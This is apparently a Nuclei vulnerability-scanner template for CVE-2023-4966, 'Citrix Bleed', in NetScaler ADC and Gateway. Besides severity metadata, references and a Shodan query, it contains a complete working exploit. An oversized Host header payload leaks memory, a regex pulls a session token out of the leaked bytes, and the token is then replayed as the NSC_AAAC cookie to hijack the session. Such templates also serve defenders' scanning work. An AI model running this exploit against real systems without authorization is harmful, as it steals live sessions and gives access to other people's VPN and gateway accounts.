id: CVE-2023-4966 info: name: Citrix Bleed - Leaking Session Tokens author: DhiyaneshDK severity: high description: | Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server. reference: - https://github.com/assetnote/exploits/blob/main/citrix/CVE-2023-4966/exploit.py - https://github.com/Chocapikk/CVE-2023-4966 - https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966 - https://x.com/assetnote/status/1716757539323564196?s=20 - https://www.netscaler.com/blog/news/cve-2023-4966-critical-security-update-now-available-for-netscaler-adc-and-netscaler-gateway/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-4966 cwe-id: CWE-119,NVD-CWE-noinfo epss-score: 0.92267 epss-percentile: 0.98723 cpe: cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:fips:*:*:* metadata: verified: "true" max-request: 2 vendor: citrix product: netscaler_application_delivery_controller shodan-query: title:"Citrix Gateway" || title:"Netscaler Gateway" tags: cve,cve2023,citrix,adc,info-leak,kev,exposure variables: payload: '{{repeat("a", 24812)}}' str: "{{to_lower(rand_text_alpha(4))}}" http: - raw: - |+ GET /oauth/idp/.well-known/openid-configuration HTTP/1.1 {{str}}: {{Hostname}} Host: {{payload}} - |+ POST /logon/LogonPoint/Authentication/GetUserName HTTP/1.1 Host: {{Hostname}} Cookie: NSC_AAAC={{session}} unsafe: true extractors: - type: regex name: session part: body_1 group: 1 regex: - '([a-f0-9]{100}45525d5f4f58455e445a4a42)' internal: true - type: regex part: body_2 regex: - '([a-z0-9._]+)' matchers-condition: and matchers: - type: word words: - 'NSC_AAAC=' - 'HTTP/1.1' - type: word words: - '{"issuer":' # digest: 4a0a00473045022100cdf2365430e0f2da0503cda379c7553d92f5a110801d077669a748c61a3e43a30220062e626ed3791dc9085889abb62133b4046ed38e6163ee1e851da458ed9331fd:922c64590222798bb761d5b6d8e72950